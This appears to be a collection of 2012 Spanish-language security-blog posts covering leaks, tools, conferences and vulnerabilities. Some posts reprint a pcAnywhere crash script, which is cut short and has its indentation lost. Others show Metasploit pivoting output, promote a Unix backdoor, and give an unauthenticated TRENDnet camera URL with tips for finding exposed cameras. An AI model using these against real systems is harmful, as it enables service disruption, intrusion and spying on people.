Top 20 Security Blogs by Veracode

I didn't write in English long long time ago and, as this post introduce a compilation of security blogs written in the language of Shakespeare, I'll practice only a bit (I'm sorry to punish you xdd)

We speak about a
nice list of what Veracode Company think are the best 20 information security blogs. They used a very scientific process to compile this list. Inputs included – quality of blog content (from both a technical and an entertainment standpoint), level of authority of contributors, frequency of updates, overall appearance and their own subjectivity.

The result is the following list (in no particular order):

Fortinet Security Blog
Naked Security Blog

Cognitive Dissidents Blog with Joshua Corman

The New School of Information Security Blog

Dark Reading Blog

Securosis Blog

Krebs on Security with Brian Krebs

Thought Crime Blog with Moxie Marlinspike

Schneier on Security with Bruce Schneier

Root Labs RDIST with Nate Lawson

Threatpost Blog

Zero Day Blog with Ryan Naraine and Dancho Danchev

Rational Survivability Blog with Christofer Hoff

Securelist Blog

TaoSecurity with Richard Bejtlich

F-Secure News from the Lab Blog

Andrew Hay Blog

Uncommon Sense Security Blog with Jack Daniel

Network Security Blog with Martin McKeay

SANS AppSec Blog with Frank Kim

and extra mention for the young Security Bistro Blog.

Please feel free to comment here or on the original entry if you know another great blog.

And remember that in Hackplayers you can also find more blogs in Spanish and English.

Anonymous y Wikileaks filtran correos de la "CIA privada" Stratfor

En diciembre del año pasado Anonymous comprometió varios servidores de Stratfor Global Intelligence, una empresa de inteligencia privada afincada en Texas y que muchos han bautizado como la "CIA privada".

De aquellos ataques se obtuvieron 860.160 hashes de contraseñas, de las cuales al menos el 9% eran débiles ya que se recuperaron en claro
en menos de 5 horas (análisis deThe Tech Herald) y simplemente con hashcat.

Pero ahí no quedó la cosa y también se obtuvieron listas de clientes de Stratfor, tarjetas de crédito y sobretodo 200 GB de correos electrónicos con más de 5 millones de mensajes
fechados entre julio de 2004 y diciembre de 2011.

Con tal cantidad de información, Anonymous ha iniciado con
Wikileaks una alianza insólita hasta el momento, identificándola como el socio perfecto para clasificar y sacar a la luz todos los datos obtenidos, en la que se filtra el uso de redes de informantes y estructuras de sobornos por parte de Strafor y se recoge información delicada de muchos de sus clientes.

Y la maquinaria de Assange no se ha echo esperar. Apoyándose en varios medios para difundir las noticias (en España el diario digital Público.es), ya están publicándose los primeros emails, los llamados Ficheros de la Inteligencia Global:

The Global Intelligence Files
Twitter tag: #gifiles

Nmap: de escaneador de puertos a escaneador de vulnerabilidades

Nmap es el escaner de puertos por excelencia, sin embargo el NSE (Nmap Scripting Engine) está cambiando la forma de utilizarlo.

NSE es una de las características más potentes y flexibles de Nmap y permite desde escribir sencillos scripts para automatizar una amplia variedad de tareas de red hasta incluso encontrar vulnerabilidades que pueden ser explotadas. Estos scripts se ejecutan en paralelo y permiten a Nmap ser un escaner de vulnerabilidades muy poderoso.


Filtran una guía de censura de Facebook

Un hombre marroquí de 21 años de edad, al que pagaban 1 dólar a la hora por moderar contenidos en Facebook a través de una subcontrata, ha filtrado un documento que muestra cómo la Red Social aplica restricciones.

El antiguo empleado que trabajó en oDesk, la empresa que modera contenidos en Facebook, facilitó al blog de Gawker una guía con las directrices principales para la regulación de contenidos.

Se trata de la versión 6.2 del manual actualizado "Estándares de abuso", un documento de 17 páginas en el podréis encontrar cosas tan curiosas como que Facebook elimina todas las formas de actividad sexual pero permite imágenes con animales muertos e incluso heridas profundas o cabezas y miembros aplastados de personas.

Recordar que detrás de cada foto que subís puede haber un desconocido examinándola. Ahora con este documento podréis entender mejor cuales son las reglas por las que se rigen sus acciones:

Abuse Standards 6.2 - Operation Manual

Publicado exploit que hace fallar pcAnywhere

El pasado viernes 17 de febrero Johnathan Norman, director de investigación en seguridad de Alert Logic, publicó en Pastebin código en Python que puede causar una denegación de servicio (DoS) en versiones de pcAnywhere en Windows, incluso parcheadas (versión 12.5.0 build 463 y posteriores).

Concretamente este breve script denominado "PCAnywhere Nuke" hace fallar (crash) el servicio
ashost32 sin necesidad de pre-autenticarse en el equipo de la víctima:

 #!/usr/bin/python
'''
Exploit Title: PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman spoofy <at> exploitscience.org or @spoofyroot
Version: PCAnyWhere (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my inital impressions
are that controlling execuction will be a pain.
'''
import sys
import socket
import argparse
if len(sys.argv) != 2:
print "[+] Usage: ./pcNuke.py <HOST>"
sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)
# ACK!
s.send("\x6f\x06\xfe")
buf = s.recv(1024)
# Auth capability part 1
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
# Auth capability part 2
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

Además recordemos que, hace un mes, Symantec recomendó a sus usuarios desactivar pcAnywhere hasta que publicaran un parche para solucionar otra vulnerabilidad crítica que podría permitir la ejecución remota de código. Su descubridor, Edward Torkington de NGS Secure, no publicará los detalles de este bug hasta el próximo 25 de abril de 2012.

Si a esto le sumamos las también recientes filtraciones de código fuente con intento de extorsión incluido, podemos vislumbrar que últimamente no corren buenos tiempos para Symantec...

Webloic para Android por Alfred

Desde Anonymous Argentina nos llega una versión de LOIC para Android: WebLoic by alfred.

Esta herramienta ha sido fácilmente creada a través de AppsGeyser, un servicio gratuito on-line que permite generar una aplicación de Android simplemente con una URL, código HTML o documento (PDF o DOC) y sin tener conocimientos previos de programación.

En este caso, el autor utilizó una URL de una página de pastehtml que contenía una versión Javascript de LOIC para atacar al Gobierno argentino bajo la operación #opargentina.

Cuando la aplicación se ejecuta, el componente WebView muestra el contenido de la URL, que es básicamente una página web con un JavaScript que envía 100 peticiones HTTP con el mensaje “We are LEGION!” como uno de sus parámetros.

Cómo veis, crear aplicaciones para Android que ejecuten ataques DoS es ahora muy fácil...

Libro: Practical Malware Analysis

Empezamos la semana con un nuevo e interesante libro de Michael Sikorski y Andrew Honig que repasa las principales herramientas y técnicas que utilizan los analistas profesionales de malware.

'Practical Malware Analysis' es una guía que nos enseñará a analizar, depurar y desensamblar de forma segura cualquier software malicioso.

Con esta obra aprenderemos a:

- Instalar un entorno virtual seguro para analizar el malware.
- Extraer rápidamente las firmas de red y los indicadores basados en el equipo.
- Utilizar herramientas de análisis fundamentales como IDA Pro, OllyDbg y WinDbg.
- Conocer algunos trucos que utiliza el malware como técnicas de ofuscación, anti-desensamblado, anti-debugging y anti-máquinas virtuales.
- Utilizar el conocimiento adquirido del funcionamiento interno de Windows para el análisis de malware.
- Desarrollar una metodología para descomprimir el malware y obtener experiencia práctica con cinco de lo empacadores más populares.
- Analizar casos especiales de malware con código shell, C y código de 64 bits.

Además, para promocionar el lanzamiento de este libro, con el código REVERSEIT ofrecen un 40% de descuento y el acceso inmediato al PDF completo.

Tabla de contenidos (PDF)

Índice del libro (PDF)

Intersect 2.0: herramienta de post-explotación automática para Linux

Intersect 2.0 es un script escrito en Python que automatiza muchas de las tareas post-explotación de un sistema Linux.

La idea es que, después de que hayamos comprometido un equipo, este script nos ayude y facilite la ejecución de todas las acciones que normalmente hacemos a mano. Intersect obtendrá ficheros de contraseñas, copiará las claves SSH, enumerará procesos y aplicaciones instaladas, obtendrá información detallada de la red, mapeará los host internos (para pivoting), localizará e identificará los antivirus y firewalls comunes y mucho más.

Podéis ver también una pequeña demo en el siguiente vídeo:


Material ShmooCon 2012


Del 27 al 29 de enero tuvo lugar en Washington D.C una de las mejores conferencias de seguridad informática en los Estados Unidos: la Shmoocon 2012. Ahora por fin, ya tenemos disponible todos los videos y presentaciones del evento:

***2/16 UPDATE- All the videos have been re-ripped and are now available here.***

Keynote - Peter Gutmann - video
Closing Plenary - Arlen, Marcus, and Potter - Doing InfoSec Right - video pt 1, pt 2

Ben Agre - Cool New Crypto - video
Brad Antoniewicz - Attacking Proximity Card Access Systems - video
atlas of d00m - < GHz or Bust - video
Corey Benninger and Max Sobell - Intro to Near Field Communication (NFC) Mobile Security - video

Recomendaciones: Seginformatica.net (DISCONTINUADO!)

Actualización: el blog ha dejado de existir y el dominio ha sido traspasado y actualmente redirige a diversas webs incluso peligrosas.

El siguiente blog que os recomendamos es
Seginformatica.net, fue un blog técnico que empezó a funcionar en octubre del 2011 y que se dedicaba a la seguridad informática y al estudio de nuevas vulnerabilidades.

Su autor era p0is0n-123 al que seguramente ya muchos conoceréis de su etapa de administrador en Indetectables.net.
Gracias a él, nos animamos a crear una página de afiliados para intercambio de banners.

Así que si queréis ya sabéis ;)

Votación para las mejores técnicas de hacking web del 2011

Cada año la comunidad que se dedica a la seguridad web produce una gran cantidad de nuevas técnicas de hacking que son publicadas en blogs, artículos, white papers, listas de correo, etc.

Si recordáis, el año pasado ya os mostramos las 10 mejores técnicas de hacking web en el 2010, un ranking patrocinado por Black Hat, OWASP y White Hat Security que fue presentado en la conferencia IT_Defense 2011.

Para este año además os animamos a que participéis activamente en la elección de las mejores técnicas del 2011. ¿Cómo? Pues la primera fase de la votación está abierta a todo el mundo hasta el próximo 20 de febrero. Podréis votar vuestras 15 favoritas entre 50 preseleccionadas o especificar alguna otra que consideréis oportuna. Después, el 26 de febrero, un jurado de expertos elegirá el top 10 final de entre las 15 más votadas.

Así que, ¿a qué esperas para votar? ;)

La gran lista

Pivotando con Metasploit usando autoroute

Pivoting es la técnica en la que, a través de una máquina ya comprometida, se intenta escanear y atacar otras máquinas de otro segmento de red no accesible directamente por el atacante. Evidentemente esto nos permitirá evitar la protección de firewalls, NATs y otras restricciones de acceso.

En Metasploit existe el módulo denominado autoroute con el que podremos crear fácilmente una ruta a través de una sesión de Meterpreter, consiguiendo así pivotar dentro de la red objetivo.

Veamos un ejemplo. Imaginemos que hemos comprometido un servidor con IP 192.168.1.201 que tiene otro interfaz de red (dual-homed) conectado a la red 10.1.13.0/24:


meterpreter > ipconfig

Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: d2:d6:70:fa:de:65
IP Address : 10.1.13.3
Netmask : 255.255.255.0

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

Citrix XenServer PV Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: c6:ce:4e:d9:c9:6e
IP Address : 192.168.1.201
Netmask : 255.255.255.0

A continuación y mediante el script autoroute añadiremos la segunda red, que nos permitirá posteriormente atacarla a través del servidor comprometido:

Las mejores herramientas del 2011

El siguiente informe de Nabil Ouchn y Maxi Soler, lista las mejores herramientas y utilidades del 2011 basandose en las puntuaciones de VulnerabilityDatabase.com:

Anonymous "hackea" la web del PP de Foz, un pueblo de Lugo

"¿Y por qué nosotros?". Es lo que a esta hora se deben estar preguntando los integrantes del Partido Popular de la costera localidad de Foz, en Lugo. Su página web ha sido hackeada este lunes por Anonymous.

El grupo de piratas informáticos ha modificado la página de inicio de la web en la que sale ahora un vídeo con un mensaje en el que arremete contra la clase política actual. Anonymous denuncia y se dirige a los "detestados corruptos, plutócratas y demás vividores a costa del pueblo"."España camina rumbo a los seis millones de parados mientras continuáis vuestra impostura bajo esta pseudodemocracia que nació enferma. Os habéis fusionado bajo un solo aparato que apararenta normalidad social y división de poderes mientras destila un totalitarismo soterrado que uniformiza la opinión del pueblo, vuestro pueblo, al que habéis dejado hundirse en la ignorancia y la miseria", denuncian.

El ataque ha tenido una gran repercusión en toda la Red, y PP de Foz se ha convertido enseguida en Trending Topic en Twitter.

- Visto en Qué!.

- Página web del PP de Foz (http://www.ppdefoz.es./).

- Vídeo de Anonymous (http://www.youtube.com/watch?v=v9hOL-glfHg&feature=player_embedded).

Recomendaciones: foro rootscripts.com

Hoy domingo de descanso queríamos haceros una recomendación, un nuevo foro creado por Xt3mp & ar3sw0rmed donde encontrarás los mejores exponentes en diferentes áreas de la informática; como lo es: programación, modding, seguridad, y por obvias razones, hacking.

El foro prácticamente acaba de nacer y desde aquí os animamos a todos a que os deis una vuelta por el sitio, os creéis un usuario e intercambiéis vuestras inquietudes y conocimientos con el resto. Compartir y ser buenos! ;)


pd. Y ya sabes, si tu también tienes un blog, una comunidad, un foro o lo que sea relacionado con la seguridad informática y el hacking ético, ¡te animamos también a participar y compartirlo con nosotros!

Trixd00r v0.0.1: un backdoor invisible para Unix

NullSecurity Team ha publicado "Trixd00r v0.0.1" un backdoor avanzado e invisible, basado en TCP/IP y para sistemas UNIX. Ha sido probado en las siguientes distribuciones:

* debian 6.0 (2.6.32) - libpcap 0.8

* gentoo 3.2.5 - libpcap 1.2.1
* gentoo 3.1.5 - libpcap 1.2.0
* gentoo 3.0.6 - libpcap 1.1.1
* freebsd 8.2 - libpcap 1.0.0
* netbsd 5.1 - libpcap 0.9.4
* openbsd 4.9 - libpcap 0.x
* openbsd 5.0 - libpcap 0.x
* SunOS 5.11 - libpcap 1.0.0
* Mac OS X 10.7.3 - libpcap 1.1.1

Consiste en un servidor y un cliente. El servidor espera la llegada de magic packets por medio de un sniffer. Si el magic packet llega, este abrirá un shell en un puerto TCP o UDP determinado o conectará de forma inversa con el cliente sobre TCP o UDP.

El cliente se utiliza para enviar los magic packets con el objetivo de "despertar" al servidor y obtener una shell. Puedes descargar y usar trixd00r-0.0.1.tar.gz desde el sitio web de NullSecurity.

ClubHACK Magazine nº25

Se ha publicado el número 25 (febrero 2012) de Clubhack Magazine. Este mes, la revista india se centra en la seguridad y explotación de red. Los artículos son los siguientes:

0x00 Tech Gyan - Exploiting Remote System without Being Online
0x01 Tool Gyan - Cain and Abel: The Black Art of ARP Poisoning
0x02 Mom's Guide - Firewall 101
0x03 Legal Gyan - Liability of Intermediaries under the Information Technology Act
0x04 Matriux Vibhag - Introduction to Skipfish
0x05 Poster - "Secured Network"

La versión PDF puede descargarse desde:
http://chmag.in/issue/feb2012.pdf

Clickjacking en Google

A continuación os mostramos un vídeo con una prueba de concepto que demuestra como, mediante clickjacking, un atacante envía un correo a la víctima y ésta publica un mensaje en su muro de G+ sin darse cuenta.

Se trata de una vulnerabilidad descubierta por Aditya Gupta, Subho Halder y Dev Kar, reportada hoy mismo a Google y que podría permitir a un atacante realizar acciones sin el conocimiento ni el consentimiento del usuario, pudiendo por ejemplo permitir la creación de mensajes de spam de forma similar a los que se han visto recientemente en Facebook.


Día Internacional de la Internet Segura 2012

El DIA INTERNACIONAL DE LA INTERNET SEGURA es un evento que tiene lugar cada año en el mes de febrero, con el objetivo de promover en todo el mundo un uso responsable y seguro de las nuevas tecnologías, especialmente entre menores y jóvenes.

El evento está promovido por la Comisión Europea y está organizado por INSAFE, la Red Europea por una Internet Segura, y en España por el CENTRO DE SEGURIDAD EN INTERNET: PROTEGELES en el marco del Safer InternetProgram.

En 2012, el Día internacional de la Internet Segura -SID 2012- se celebra en más de 70 países de todo el mundo y está dedicado a frenar la famosa brecha digital. Promoviendo el diálogo y el trabajo entre generaciones,bajo el eslogan: CONECTANDO GENERACIONES.

Spot SID2012 - Día de Internet Segura 2012

Sigue el streaming en directo del I Congreso Nacional Jovenyenred (10:00-13:00h GMT+1)

Más de mil de cámaras (des)velan tu seguridad

El título de esta entrada hace cierta alusión al antiguo eslogan de Metro de Madrid (de la película mejor ni hablo), pero bien podría titularse "Gran Hermano 24h", "La vida en directo" o algo parecido.

Hablamos de una vulnerabilidad reportada a mediados de enero en el blog Console Cowboys en el que avisaban de que algunos modelos de cámaras IP TRENDnet permiten acceder a un cgi sin autenticación que, nada más y nada menos, muestra continuamente capturas de vídeo en tiempo real.


El resultado: actualmente existen miles de cámaras accesibles en Internet que permiten ver en directo lo que está pasando al otro lado, y sólo con poner en el navegador la URL: http://IP_victima/anony/mjpg.cgi.

El fabricante ya ha publicado una nueva versión de firmware que soluciona este fallo, pero todos sabemos que la mayoría de los usuarios no están pendientes de las actualizaciones.

Por ello, podremos encontrar todavía multitud de cámaras vulnerables buscando 'netcam' en Shodan (Google ya retiró los enlaces) o por medio de este útil script en Python.

O, más fácil aún, simplemente buscando 'anony/mjpg.cgi' en Pastebin.com, donde además encontraremos auténticos recopilatorios de URLs, algunos de ellos clasificados por país e incluso por tipo de visionado.


Abstenerse voayeurs... }:)

Vulnerabilidad crítica en PHP producida al corregir otra

Stefan Esser (@i0n1c), consultor de seguridad independiente y creador de la popular extensión de seguridad Suhosin para PHP, identificó hace unos días un fallo de seguridad crítico que puede ser explotado para ejecutar código arbitrario en los servidores con PHP 5.3.9 y anteriores.

Lo gracioso es que, esta vulnerabilidad ya catalogada como CVE-2012-0830, fue introdudica accidentalmente a principios de enero para corregir otra vulnerabilidad, la CVE-2011-4885, que solucionaba un DoS por colisiones de hashes.

Esta corrección añadió la propiedad 'max_input_vars' en php.ini que limita el número de variables que pueden ser usados en una petición (por ej. http://request.com/foo.php?a=1&b=2&c=3), por defecto hasta un máximo de 1.000.

Los cambios fueron hechos en 'php_variables.c', que registra todas las variables de una petición llamando a la función vulnerable 'register_variable_ex':

mimikatz: recupera las contraseñas en claro desde LSASS

Hace un par de días leíamos una entrada del blog de S21Sec en la que vaticinaban el fin de las técnicas Pass-the-hash mientras existiera y funcionara la herramienta mimikatz del francés "Gentil Kiwi".

Es decir, ya no será necesario reutilizar los hashes de un usuario (sin salt) para acceder a otros equipos o tirar de rainbow tables para crackear por fuerza bruta las contraseñas. Como mimikatz obtendremos las passwords en claro instantánemente.

¿Cómo? Pues viene perfectamente explicado en la entrada del blog que comentábamos, pero para resumir podemos decir que dentro del LSA (Local Security Authority) de Windows existen dos proveedores de autenticación por defecto (Tspkg y Wdigest) que almacenan las credenciales de los usuarios de forma reversible. Realmente no por un fallo inadvertido, si no porque estos módulos proveen autenticación a otros esquemas que necesitan conocer la contraseña, no sólo el hash.

Sin embargo, esto facitita a un atacante la posibilidad de recuperar las contraseñas en claro si dispone de permisos de debug sobre el proceso del LSASS (grupo de adminitradores), algo que podría haber conseguido previamente, por ejemplo, mediante la explotación previa de una vulnerabilidad de escalado privilegios (accediendo como SYSTEM).